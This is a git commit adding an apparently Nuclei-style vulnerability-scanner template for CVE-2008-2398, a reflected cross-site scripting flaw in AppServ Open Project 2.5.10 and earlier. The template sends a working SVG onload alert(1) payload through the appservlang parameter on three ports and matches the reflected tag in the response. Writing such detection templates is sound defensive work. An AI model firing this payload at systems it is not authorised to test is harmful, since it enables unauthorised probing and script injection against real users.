cve-2008-2398 added
parent
0f774beac8
commit
8c9ce49b2d
|
@ -0,0 +1,22 @@
|
|||
id: cve-2008-2398
|
||||
|
||||
info:
|
||||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}:8181/index.php?appservlang=en%22><svg/onload=alert(1)>"
|
||||
- "{{BaseURL}}:8081/index.php?appservlang=en%22><svg/onload=alert(1)>"
|
||||
- "{{BaseURL}}:443/index.php?appservlang=en%22><svg/onload=alert(1)>"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
part: body
|
Loading…
Reference in New Issue